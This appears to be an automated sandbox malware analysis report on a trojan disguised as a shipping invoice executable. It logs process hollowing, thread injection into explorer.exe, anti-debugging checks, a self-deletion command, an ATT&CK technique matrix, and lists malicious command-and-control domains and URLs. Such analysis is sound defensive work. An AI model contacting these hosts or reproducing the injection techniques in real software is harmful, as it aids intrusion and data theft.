Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]	2_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]	2_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]	2_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]	2_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]	2_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]	2_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]	2_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]	2_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]	2_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]	2_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]	2_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]	2_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]	2_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00426DA1

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0042202E SetUnhandledExceptionFilter,	0_2_0042202E
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004230F5
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00417D93
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00421FA7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_00449C10 SetUnhandledExceptionFilter,	4_2_00449C10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_004495F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_004495F0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 4084			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 4084			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 440000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D42008

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0043916A LogonUserW,

0_2_0043916A

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

0_2_0040D6D0

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004375B0

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

0_2_00436431

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00445DD3

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_004430F2 AllocateAndInitializeSid,GetLastError,GetLengthSid,FreeSid,GetLengthSid,memcpy,FreeSid,

4_2_004430F2

Source: Invoice Packing list For Sea Shipment.exe, explorer.exe, 00000003.00000002.3877356610.0000000009379000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2289271188.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442190275.00000000044D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.3868983730.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3869609563.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1440954816.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.3869609563.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1440954816.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: Invoice Packing list For Sea Shipment.exe	Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000002.3869609563.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1440954816.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.3877356610.0000000009379000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2289271188.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077305092.0000000009379000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00410D10 cpuid

0_2_00410D10

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,

4_2_00445C84

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_004223BC

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_004711D2 GetUserNameW,

0_2_004711D2

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

0_2_0042039F

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0040E470

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Invoice Packing list For Sea Shipment.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: Invoice Packing list For Sea Shipment.exe	Binary or memory string: WIN_XP
Source: Invoice Packing list For Sea Shipment.exe	Binary or memory string: WIN_XPe
Source: Invoice Packing list For Sea Shipment.exe	Binary or memory string: WIN_VISTA
Source: Invoice Packing list For Sea Shipment.exe	Binary or memory string: WIN_7

Remote Access Functionality

Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_004741BB
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,	0_2_0046483C
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0047AD92

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	225 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	2 Valid Accounts	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	512 Process Injection	2 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	512 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice Packing list For Sea Shipment.exe	42%	ReversingLabs	Win32.Trojan.Swotter
Invoice Packing list For Sea Shipment.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
94950.bodis.com	199.59.243.227	true	true	unknown
www.xhyx.top	154.197.26.133	true	true	unknown
www.rasko.net	89.184.73.149	true	true	unknown
www.rbuds.shop	unknown	unknown	true	unknown
www.epehr.pics	unknown	unknown	true	unknown
www.acifictechnologycctv.net	unknown	unknown	true	unknown
www.ithin-ksvodn.xyz	unknown	unknown	true	unknown
www.hqm-during.xyz	unknown	unknown	true	unknown
www.ebaoge318.top	unknown	unknown	true	unknown
www.isit-txax.xyz	unknown	unknown	true	unknown
www.eader-aaexvn.xyz	unknown	unknown	true	unknown
www.9net88.net	unknown	unknown	true	unknown
www.lsader.app	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.xhyx.top/ge07/?T8itM8U=nFq8hlOZkZdpcl2LrU6NtCobGyYRF4oO9voe8xIKTNUMBh2BLqz18CwKfuceLAjhfH+x&FXT8AF=2dkTOn9Hj2ox	true	unknown
www.9net88.net/ge07/	true	unknown
http://www.9net88.net/ge07/?FXT8AF=2dkTOn9Hj2ox&T8itM8U=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tPZEr4Tl6UO	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.isit-txax.xyz/ge07/www.ithin-ksvodn.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comer	explorer.exe, 00000003.00000000.1446422764.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879717070.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rbuds.shop/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.eloshost.xyzReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOSA4	explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		unknown
